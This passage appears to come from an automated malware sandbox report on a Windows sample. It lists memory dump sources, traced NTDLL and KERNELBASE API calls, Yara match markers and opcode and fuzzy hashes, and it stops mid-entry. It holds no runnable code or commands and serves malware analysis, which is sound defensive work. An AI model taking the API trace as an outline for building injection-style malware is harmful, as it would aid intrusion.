                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 0b255ba7ecd1fdc6f43e43aa6618faa7ac061417212e27599fa2efb298f8374a
                    • Instruction ID: 3be13723d6d4e94cf3e9415f28183051bf0c39dbe9a3e20bd93f4ee1f1a0af0b
                    • Opcode Fuzzy Hash: 0b255ba7ecd1fdc6f43e43aa6618faa7ac061417212e27599fa2efb298f8374a
                    • Instruction Fuzzy Hash: 3F90027120505D42D14071998404A460115A7D0355F71C011E4454794DD6658D55B7A1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: d08cf077db7a77419f3774d41f09fa5b524a9715deb97f3665ce45542711a162
                    • Instruction ID: 7c0181a91c00a1b3a60697409ffdfdccdd23826c23a378f780744dc5eccd10e6
                    • Opcode Fuzzy Hash: d08cf077db7a77419f3774d41f09fa5b524a9715deb97f3665ce45542711a162
                    • Instruction Fuzzy Hash: 4390027120101D42D10061998404B460105A7E0351F71C016E4514754DC655CC517661
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                    • Instruction ID: 890a4a438f743af7169fdbce38f6f6180516e1a358982a88963bdbb4a1e04d6c
                    • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                    • Instruction Fuzzy Hash:
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0106FDFA
                    Strings
                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0106FE2B
                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0106FE01
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                    • API String ID: 885266447-3903918235
                    • Opcode ID: bc793b02d4f59f0fdff85afeabce4a3c319f78901c8578c60855166f289103f5
                    • Instruction ID: fd50fafaa108790fd8ac56455ad37b946f0a9c83e1487d4e508fbced3f264001
                    • Opcode Fuzzy Hash: bc793b02d4f59f0fdff85afeabce4a3c319f78901c8578c60855166f289103f5
                    • Instruction Fuzzy Hash: 1EF0F632240602BFE6201A49ED02F63BF5EEB44B70F140314F668565D1DA62F93096F1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Executed Functions

                    APIs
                    • NtClose.NTDLL(PMt,?,?,00744D50,00000000,FFFFFFFF), ref: 0074A4B5
                    Strings
                    Memory Dump Source
                    • Source File: 00000018.00000002.545105999.0000000000730000.00000040.00020000.sdmp, Offset: 00730000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: Close
                    • String ID: PMt$|j]
                    • API String ID: 3535843008-396151443
                    • Opcode ID: f63ec25d8e9461fe05a9052d80bf6233ea34710e30f7cc8f0fee3a73b863c62a
                    • Instruction ID: 1a69b2f4c5fc32f25630b3128b67099f1fda8fcf83fbe77703d4cfcada845b3d
                    • Opcode Fuzzy Hash: f63ec25d8e9461fe05a9052d80bf6233ea34710e30f7cc8f0fee3a73b863c62a
                    • Instruction Fuzzy Hash: 6DD02B994092C04BC710EAF464C10867B40DD406187244DCEECD447207D128D61A5392
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,1Jt,FFFFFFFF,?,rMt,?,00000000), ref: 0074A455
                    Strings
                    Memory Dump Source
                    • Source File: 00000018.00000002.545105999.0000000000730000.00000040.00020000.sdmp, Offset: 00730000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: FileRead
                    • String ID: 1Jt
                    • API String ID: 2738559852-2266383391
                    • Opcode ID: 3d88fc1a2da1b9004bfee72b3cf0bf6d816733e6010ec38f4e06c0a458864495
                    • Instruction ID: ac22c8697d0f1a8b60b6d50f696833fba96af77dae8aa96ff53bdeebba2fc528
                    • Opcode Fuzzy Hash: 3d88fc1a2da1b9004bfee72b3cf0bf6d816733e6010ec38f4e06c0a458864495
                    • Instruction Fuzzy Hash: A611E2B6204148AFCB04DF99DC80DEB77A9EF8C758F158248FA1D97245D634E8168BA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • NtCreateFile.NTDLL(00000060,00000000,.z`,00744BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00744BB7,007A002E,00000000,00000060,00000000,00000000), ref: 0074A3AD
                    Strings
                    Memory Dump Source
                    • Source File: 00000018.00000002.545105999.0000000000730000.00000040.00020000.sdmp, Offset: 00730000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: CreateFile
                    • String ID: .z`
                    • API String ID: 823142352-1441809116
                    • Opcode ID: 3e6b484f4ac81a70e4539873d4430ad5d792cd56c235557c585e517be6e29f26
                    • Instruction ID: f41d617f6fba5b3053d38e468537598ca393075443543ca202e868b686983480
                    • Opcode Fuzzy Hash: 3e6b484f4ac81a70e4539873d4430ad5d792cd56c235557c585e517be6e29f26
                    • Instruction Fuzzy Hash: 0711CEB2200209BBCB08DF88DC85DEB77ADEF8C754F108608FA1997241D634E8518BA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • NtCreateFile.NTDLL(00000060,00000000,.z`,00744BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00744BB7,007A002E,00000000,00000060,00000000,00000000), ref: 0074A3AD
                    Strings
                    Memory Dump Source
                    • Source File: 00000018.00000002.545105999.0000000000730000.00000040.00020000.sdmp, Offset: 00730000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: CreateFile
                    • String ID: .z`
                    • API String ID: 823142352-1441809116
                    • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                    • Instruction ID: 87afbc0fe3509032ce58d1fc9b9ac5fa747003435ff6bdb9cee3b7c068f6d695
                    • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                    • Instruction Fuzzy Hash: 19F0BDB2200208ABCB08CF88DC85EEB77ADAF8C754F158248BA0D97241C630E8118BA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,1Jt,FFFFFFFF,?,rMt,?,00000000), ref: 0074A455
                    Strings
                    Memory Dump Source
                    • Source File: 00000018.00000002.545105999.0000000000730000.00000040.00020000.sdmp, Offset: 00730000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: FileRead
                    • String ID: 1Jt
                    • API String ID: 2738559852-2266383391
                    • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                    • Instruction ID: 65707ecfd9a371682279310f55d546c479a422a1c562894a839a37be598b5f19
                    • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                    • Instruction Fuzzy Hash: E2F0B7B2200208AFDB14DF89DC85EEB77ADEF8C754F158248BE1D97241D630E811CBA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • NtClose.NTDLL(PMt,?,?,00744D50,00000000,FFFFFFFF), ref: 0074A4B5
                    Strings
                    Memory Dump Source
                    • Source File: 00000018.00000002.545105999.0000000000730000.00000040.00020000.sdmp, Offset: 00730000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: Close
                    • String ID: PMt
                    • API String ID: 3535843008-2168615887
                    • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                    • Instruction ID: 7f7cbcf3b0387ba80358b11566dcb6dbce13a3342eb789e160eeeb9b95a27428
                    • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                    • Instruction Fuzzy Hash: B1D01275240214BBD710EB98CC45E97775CEF44750F154455BA185B242C530F50086E0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00732D11,00002000,00003000,00000004), ref: 0074A579
                    Memory Dump Source
                    • Source File: 00000018.00000002.545105999.0000000000730000.00000040.00020000.sdmp, Offset: 00730000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: AllocateMemoryVirtual
                    • String ID:
                    • API String ID: 2167126740-0
                    • Opcode ID: ec05d6b7fa3ee7d69b6f4fd2ca4d028c3fbdf4fe9bad70b243364da362aa394e
                    • Instruction ID: 6440762ce8e4c3f3625f59b65d49ee84dc3c1bf90e26c3ae35932908bf3034fd
                    • Opcode Fuzzy Hash: ec05d6b7fa3ee7d69b6f4fd2ca4d028c3fbdf4fe9bad70b243364da362aa394e
                    • Instruction Fuzzy Hash: D1F01CB2210208ABDB14DF88DC91EEB77ADEF88754F158548FE589B241C630E911CBA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00732D11,00002000,00003000,00000004), ref: 0074A579
                    Memory Dump Source
                    • Source File: 00000018.00000002.545105999.0000000000730000.00000040.00020000.sdmp, Offset: 00730000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: AllocateMemoryVirtual
                    • String ID:
                    • API String ID: 2167126740-0
                    • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                    • Instruction ID: f3fa0d1b99a2cc8863d9706280ce1ffcc30c198a07ddffd235c50bef31d639bb
                    • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                    • Instruction Fuzzy Hash: 2AF015B2200208ABDB14DF89CC81EAB77ADEF88754F118148BE0897241C630F811CBA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000018.00000002.547801990.0000000003220000.00000040.00000001.sdmp, Offset: 03220000, based on PE: true
                    • Associated: 00000018.00000002.548420844.000000000333B000.00000040.00000001.sdmp
                    • Associated: 00000018.00000002.548437267.000000000333F000.00000040.00000001.sdmp
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 950f83a70a865de795caef48d4771ce032487bde107a44f71477f0e6195059cc
                    • Instruction ID: a12b26951181e9caac5da87a04371ed2c5fd23672e6b1bb3b5f799eee003ad6c
                    • Opcode Fuzzy Hash: 950f83a70a865de795caef48d4771ce032487bde107a44f71477f0e6195059cc
                    • Instruction Fuzzy Hash: DF90026122184442E600A5794D14B07000597D0343F51C116A0144554CCA558CA17571
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000018.00000002.547801990.0000000003220000.00000040.00000001.sdmp, Offset: 03220000, based on PE: true
                    • Associated: 00000018.00000002.548420844.000000000333B000.00000040.00000001.sdmp
                    • Associated: 00000018.00000002.548437267.000000000333F000.00000040.00000001.sdmp
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 7fe25e15e488bfacefe536c85ee3c6dac1be93a6a42e62b924d2e17adcfa48c7
                    • Instruction ID: 7a208a2a55a8d491cb51e181822955e354732ac9f9291be3396001c9fb1b4c35
                    • Opcode Fuzzy Hash: 7fe25e15e488bfacefe536c85ee3c6dac1be93a6a42e62b924d2e17adcfa48c7
                    • Instruction Fuzzy Hash: 809002B121104802E540B1694504746000597D0341F51C012A5054554E87998DD576B5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000018.00000002.547801990.0000000003220000.00000040.00000001.sdmp, Offset: 03220000, based on PE: true
                    • Associated: 00000018.00000002.548420844.000000000333B000.00000040.00000001.sdmp
                    • Associated: 00000018.00000002.548437267.000000000333F000.00000040.00000001.sdmp
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 3644fded2a711db54d979e66f4547d5937b2a9360517a6dd4c4aabb1d4f2d70c
                    • Instruction ID: f04aaee94a9659af2e96edfe257a6f0a26643053db584bb1db07a8f615c27904
                    • Opcode Fuzzy Hash: 3644fded2a711db54d979e66f4547d5937b2a9360517a6dd4c4aabb1d4f2d70c
                    • Instruction Fuzzy Hash: 1B9002A135104842E500A1694514B060005D7E1341F51C016E1054554D8759CC927176
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000018.00000002.547801990.0000000003220000.00000040.00000001.sdmp, Offset: 03220000, based on PE: true
                    • Associated: 00000018.00000002.548420844.000000000333B000.00000040.00000001.sdmp
                    • Associated: 00000018.00000002.548437267.000000000333F000.00000040.00000001.sdmp
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 20502796c1f7a6dfa973799fc96b05c7be09677b07628d8dbcd1e65f21b40636
                    • Instruction ID: a401ea55cdf58beb23dfa2637b9cb3cb19fa0ef0752f0fd2a8f58f9bc0e0b459
                    • Opcode Fuzzy Hash: 20502796c1f7a6dfa973799fc96b05c7be09677b07628d8dbcd1e65f21b40636
                    • Instruction Fuzzy Hash: 5A90027121104813E511A1694604707000997D0281F91C413A0414558D97968D92B171
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000018.00000002.547801990.0000000003220000.00000040.00000001.sdmp, Offset: 03220000, based on PE: true
                    • Associated: 00000018.00000002.548420844.000000000333B000.00000040.00000001.sdmp
                    • Associated: 00000018.00000002.548437267.000000000333F000.00000040.00000001.sdmp
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 07cf9a4d04ead403a79de045caadb9490ded194aa0b95b7ff9c86bffe33849a8
                    • Instruction ID: 1a9c21db9a1eee9ee142ef6ff1cf8915904da2e791fa77f4a85ae83e4850cd8f
                    • Opcode Fuzzy Hash: 07cf9a4d04ead403a79de045caadb9490ded194aa0b95b7ff9c86bffe33849a8
                    • Instruction Fuzzy Hash: F7900261252085526945F16945045074006A7E0281791C013A1404950C86669C96F671
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000018.00000002.547801990.0000000003220000.00000040.00000001.sdmp, Offset: 03220000, based on PE: true
                    • Associated: 00000018.00000002.548420844.000000000333B000.00000040.00000001.sdmp
                    • Associated: 00000018.00000002.548437267.000000000333F000.00000040.00000001.sdmp
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 44b3889a3680de8ce1ad4c57b6e89e6627c0e6564a811417718812869cecdfdc
                    • Instruction ID: 02628c35de277c8952c00cc6eda346e3deb138d32fe115e867ea183c33ab6be4
                    • Opcode Fuzzy Hash: 44b3889a3680de8ce1ad4c57b6e89e6627c0e6564a811417718812869cecdfdc
                    • Instruction Fuzzy Hash: 1D90027121104802E500A5A95508646000597E0341F51D012A5014555EC7A58CD17171
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000018.00000002.547801990.0000000003220000.00000040.00000001.sdmp, Offset: 03220000, based on PE: true
                    • Associated: 00000018.00000002.548420844.000000000333B000.00000040.00000001.sdmp
                    • Associated: 00000018.00000002.548437267.000000000333F000.00000040.00000001.sdmp
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 5cebee1022cc63ce377dc41cb7ef3c6450f7bf959064dac6232b64bc418cc6d4
                    • Instruction ID: fba85e9602a9025abed4cda840eb97832306ad503dcde29556c7f48c5e145f67
                    • Opcode Fuzzy Hash: 5cebee1022cc63ce377dc41cb7ef3c6450f7bf959064dac6232b64bc418cc6d4
                    • Instruction Fuzzy Hash: BA90026922304402E580B169550860A000597D1242F91D416A0005558CCA558CA97371
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000018.00000002.547801990.0000000003220000.00000040.00000001.sdmp, Offset: 03220000, based on PE: true
                    • Associated: 00000018.00000002.548420844.000000000333B000.00000040.00000001.sdmp
                    • Associated: 00000018.00000002.548437267.000000000333F000.00000040.00000001.sdmp
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: d9bccdfdc438747015dfeba72c8bdeb8d05520e8cc9f974f7f1167e2a75dbf5d
                    • Instruction ID: 36afc102d5d3c18cdab624e66d99030078839bb9f8e2bc0f7a6913cd4d837beb
                    • Opcode Fuzzy Hash: d9bccdfdc438747015dfeba72c8bdeb8d05520e8cc9f974f7f1167e2a75dbf5d
                    • Instruction Fuzzy Hash: F090027132118802E510A1698504706000597D1241F51C412A0814558D87D58CD17172
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000018.00000002.547801990.0000000003220000.00000040.00000001.sdmp, Offset: 03220000, based on PE: true
                    • Associated: 00000018.00000002.548420844.000000000333B000.00000040.00000001.sdmp
                    • Associated: 00000018.00000002.548437267.000000000333F000.00000040.00000001.sdmp
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 7408303693d9e8df9fbb2d716c4c6b226b3aced2ae6f7fb2e3c5369b3b70509f
                    • Instruction ID: 3a7d067741bb3310eee33f7dfba0b94e5a8a7891bd3708bcc2ee5882caf7e9a4
                    • Opcode Fuzzy Hash: 7408303693d9e8df9fbb2d716c4c6b226b3aced2ae6f7fb2e3c5369b3b70509f
                    • Instruction Fuzzy Hash: 1390027121104C02E580B169450464A000597D1341F91C016A0015654DCB558E9977F1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000018.00000002.547801990.0000000003220000.00000040.00000001.sdmp, Offset: 03220000, based on PE: true
                    • Associated: 00000018.00000002.548420844.000000000333B000.00000040.00000001.sdmp
                    • Associated: 00000018.00000002.548437267.000000000333F000.00000040.00000001.sdmp
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: cbf48bf0067e386c423bc2c27d24c1ffb4bd7b69c8cccfdcbcac78908f72e942
                    • Instruction ID: 4c9bad1fd32e0593855732374da5ef55c84dc7c7fdd68eb2925bea026468c47e
                    • Opcode Fuzzy Hash: cbf48bf0067e386c423bc2c27d24c1ffb4bd7b69c8cccfdcbcac78908f72e942
                    • Instruction Fuzzy Hash: 5290027121508C42E540B1694504A46001597D0345F51C012A0054694D97658D95B6B1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000018.00000002.547801990.0000000003220000.00000040.00000001.sdmp, Offset: 03220000, based on PE: true
                    • Associated: 00000018.00000002.548420844.000000000333B000.00000040.00000001.sdmp
                    • Associated: 00000018.00000002.548437267.000000000333F000.00000040.00000001.sdmp
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 6c0d255301f58590a071d1c993ac2903a998e340975a1de966ac02afe351b097
                    • Instruction ID: d24d11a5aa7275fda3eaefd7ddad51479f2e331ca3f31d7d9e769520059050e3
                    • Opcode Fuzzy Hash: 6c0d255301f58590a071d1c993ac2903a998e340975a1de966ac02afe351b097
                    • Instruction Fuzzy Hash: F49002712110CC02E510A169850474A000597D0341F55C412A4414658D87D58CD17171
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000018.00000002.547801990.0000000003220000.00000040.00000001.sdmp, Offset: 03220000, based on PE: true
                    • Associated: 00000018.00000002.548420844.000000000333B000.00000040.00000001.sdmp
                    • Associated: 00000018.00000002.548437267.000000000333F000.00000040.00000001.sdmp
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 4b470b29091b99c926b3c183049f854a45646662fbc8809979af6ccab1333554
                    • Instruction ID: 494f14cca1b34d71006e59b1866e648af62c70e4dd1adb450de7193ac2948dba
                    • Opcode Fuzzy Hash: 4b470b29091b99c926b3c183049f854a45646662fbc8809979af6ccab1333554
                    • Instruction Fuzzy Hash: 0490027121104C42E500A1694504B46000597E0341F51C017A0114654D8755CC917571
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000018.00000002.547801990.0000000003220000.00000040.00000001.sdmp, Offset: 03220000, based on PE: true
                    • Associated: 00000018.00000002.548420844.000000000333B000.00000040.00000001.sdmp
                    • Associated: 00000018.00000002.548437267.000000000333F000.00000040.00000001.sdmp
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 6af6060f40139cabf652678956cfff1ae61962a37b44163fca83a4ee4803796d
                    • Instruction ID: 77e0fb316b20283566d109c7536dc57bda579eed387e3fc912d856519fca051d
                    • Opcode Fuzzy Hash: 6af6060f40139cabf652678956cfff1ae61962a37b44163fca83a4ee4803796d
                    • Instruction Fuzzy Hash: 6B900475331044031505F57D07045070047D7D53D1351C033F1005550CD771CCF17171
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000018.00000002.547801990.0000000003220000.00000040.00000001.sdmp, Offset: 03220000, based on PE: true
                    • Associated: 00000018.00000002.548420844.000000000333B000.00000040.00000001.sdmp
                    • Associated: 00000018.00000002.548437267.000000000333F000.00000040.00000001.sdmp
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 304205868cb580847d5fd4ac1fba9a3d373f3a930d6ad82f2557cb96665648ff
                    • Instruction ID: a37005fd51c0de7aad619741d4d8a52311f39a071e8c14f9c8d1cac18034a106
                    • Opcode Fuzzy Hash: 304205868cb580847d5fd4ac1fba9a3d373f3a930d6ad82f2557cb96665648ff
                    • Instruction Fuzzy Hash: 0C9002A1212044035505B1694514616400A97E0241B51C022E1004590DC6658CD17175
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • Sleep.KERNELBASE(000007D0), ref: 00749128
                    Strings
                    Memory Dump Source
                    • Source File: 00000018.00000002.545105999.0000000000730000.00000040.00020000.sdmp, Offset: 00730000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: Sleep
                    • String ID: net.dll$wininet.dll
                    • API String ID: 3472027048-1269752229
                    • Opcode ID: 7a610f761d0da1d75e76726c77c53804720eb4ac1e2d24cbc414290cef663861
                    • Instruction ID: 2e9a93e732ec66035b1b5c1741333baca3a6ec72ee209c4048f281914a844cce
                    • Opcode Fuzzy Hash: 7a610f761d0da1d75e76726c77c53804720eb4ac1e2d24cbc414290cef663861
                    • Instruction Fuzzy Hash: 883192B2500745BBC714DF64C889FA7B7B8FB48B00F10851DF62A5B245D734B950CBA5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • Sleep.KERNELBASE(000007D0), ref: 00749128
                    Strings
                    Memory Dump Source
                    • Source File: 00000018.00000002.545105999.0000000000730000.00000040.00020000.sdmp, Offset: 00730000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: Sleep
                    • String ID: net.dll$wininet.dll
                    • API String ID: 3472027048-1269752229
                    • Opcode ID: f4006af846211cba52e0a7ca17cd4c9a09f7e967d71016ca24dd1f3d1dfc451d
                    • Instruction ID: c12e1a792197d6a43f3fd578e13beb95f55f79aea4b34dcae56e1efaa2f4e2e8
                    • Opcode Fuzzy Hash: f4006af846211cba52e0a7ca17cd4c9a09f7e967d71016ca24dd1f3d1dfc451d
                    • Instruction Fuzzy Hash: 0621A2B1940345FBC714DF64CC89FA7B7B8AB88B00F10845DF6295B246D778A950CBA5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00733AF8), ref: 0074A69D
                    Strings
                    Memory Dump Source
                    • Source File: 00000018.00000002.545105999.0000000000730000.00000040.00020000.sdmp, Offset: 00730000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: FreeHeap
                    • String ID: .z`
                    • API String ID: 3298025750-1441809116
                    • Opcode ID: b445280c34972953eef8159201e15f7f36d2cdf7412113ce5c5254b9fe3e8b3c
                    • Instruction ID: 2d0328ea1230d6311a2620d3bcb2493f8a86ccf5612662eacb26ec77d4a6ced6
                    • Opcode Fuzzy Hash: b445280c34972953eef8159201e15f7f36d2cdf7412113ce5c5254b9fe3e8b3c
                    • Instruction Fuzzy Hash: 7EF039B6204245AFDB25DF64CC89EA7BBA8EF84354F144588FD595B241C235F814CBA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00733AF8), ref: 0074A69D
                    Strings
                    Memory Dump Source
                    • Source File: 00000018.00000002.545105999.0000000000730000.00000040.00020000.sdmp, Offset: 00730000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: FreeHeap
                    • String ID: .z`
                    • API String ID: 3298025750-1441809116
                    • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                    • Instruction ID: 37c079b2f7aa63053c208f76d76cf00be06043696f26c544acd940f9898eb7fa
                    • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                    • Instruction Fuzzy Hash: B4E046B1200208BBDB18EF99CC49EA777ACEF88750F118558FE085B242C630F914CAF0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • RtlAllocateHeap.NTDLL(6Et,?,00744CAF,00744CAF,?,00744536,?,?,?,?,?,00000000,00000000,?), ref: 0074A65D
                    Strings
                    Memory Dump Source
                    • Source File: 00000018.00000002.545105999.0000000000730000.00000040.00020000.sdmp, Offset: 00730000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: AllocateHeap
                    • String ID: 6Et
                    • API String ID: 1279760036-96554581
                    • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                    • Instruction ID: ed868f0adc9e45d0941fcfd700749d2179cbe3ed5f2f56e85d9928ee4b19218b
                    • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                    • Instruction Fuzzy Hash: FCE012B1200208ABDB14EF99CC45EA777ACEF88654F118558BE085B242C630F9158AB0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0073836A
                    • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0073838B
                    Memory Dump Source
                    • Source File: 00000018.00000002.545105999.0000000000730000.00000040.00020000.sdmp, Offset: 00730000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: MessagePostThread
                    • String ID:
                    • API String ID: 1836367815-0
                    • Opcode ID: a493eabf7697513180435b5f665ed638a4e8f6b3857f93d23393bef0d0da5e70
                    • Instruction ID: 400cd083849fa425bc8edfef55c6e31d67ee0e6062101fb3706f6d03b0147a9d
                    • Opcode Fuzzy Hash: a493eabf7697513180435b5f665ed638a4e8f6b3857f93d23393bef0d0da5e70
                    • Instruction Fuzzy Hash: 16018431A81328B6F721AA949C47FBE776C5B40F50F054114FF04BA1C2EAA8690546F6
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0073AD62
                    Memory Dump Source
                    • Source File: 00000018.00000002.545105999.0000000000730000.00000040.00020000.sdmp, Offset: 00730000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: Load
                    • String ID:
                    • API String ID: 2234796835-0
                    • Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                    • Instruction ID: 16428aa2f17574f780d56eaacff2252583d866b8b61e1bf4e91656a4b35ef784
                    • Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                    • Instruction Fuzzy Hash: A7011EB5E0020DBBDF10DAE4DC46FEDB3789B54308F004595EA0897646F675EB148B91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0074A734
                    Memory Dump Source
                    • Source File: 00000018.00000002.545105999.0000000000730000.00000040.00020000.sdmp, Offset: 00730000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: CreateInternalProcess
                    • String ID:
